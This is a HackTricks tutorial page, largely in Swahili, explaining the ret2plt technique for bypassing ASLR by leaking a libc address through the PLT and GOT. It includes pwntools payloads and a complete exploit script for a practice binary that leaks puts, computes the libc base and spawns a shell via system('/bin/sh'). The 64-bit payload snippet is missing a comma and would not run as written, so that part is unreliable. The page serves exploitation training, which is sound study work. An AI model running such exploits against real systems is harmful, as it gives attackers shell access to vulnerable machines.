HackTricksRet2plt
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Basic Information
Lengo la mbinu hii ni kuvuja anwani kutoka kwa kazi kutoka PLT ili kuweza kupita ASLR. Hii ni kwa sababu ikiwa, kwa mfano, unavuja anwani ya kazi puts kutoka libc, unaweza kisha kuhesabu ambapo msingi wa libc uko na kuhesabu offsets ili kufikia kazi nyingine kama system.
Hii inaweza kufanywa na payload ya pwntools kama (kutoka hapa):
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)
Note how puts (akitumia anwani kutoka PLT) inaitwa kwa anwani ya puts iliyoko katika GOT (Global Offset Table). Hii ni kwa sababu wakati puts inachapisha kipengee cha GOT cha puts, kipengee hiki kitakuwa na anwani halisi ya puts katika kumbukumbu.
Pia angalia jinsi anwani ya main inavyotumika katika exploit ili wakati puts inamaliza utekelezaji wake, binary inaita main tena badala ya kutoka (hivyo anwani iliyovuja itaendelea kuwa halali).
caution
Note how in order for this to work the binary cannot be compiled with PIE or you must have found a leak to bypass PIE in order to know the address of the PLT, GOT and main. Otherwise, you need to bypass PIE first.
You can find a full example of this bypass here. This was the final exploit from that example:
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvline()
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
Mifano Mingine & Marejeleo
- https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html
- 64 bit, ASLR imewezeshwa lakini hakuna PIE, hatua ya kwanza ni kujaza overflow hadi byte 0x00 ya canary ili kisha kuita puts na kuvuja. Kwa canary, gadget ya ROP inaundwa kuita puts ili kuvuja anwani ya puts kutoka GOT na gadget ya ROP kuita
system('/bin/sh') - https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html
- 64 bits, ASLR imewezeshwa, hakuna canary, overflow ya stack katika main kutoka kwa kazi ya mtoto. Gadget ya ROP kuita puts ili kuvuja anwani ya puts kutoka GOT na kisha kuita gadget moja.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.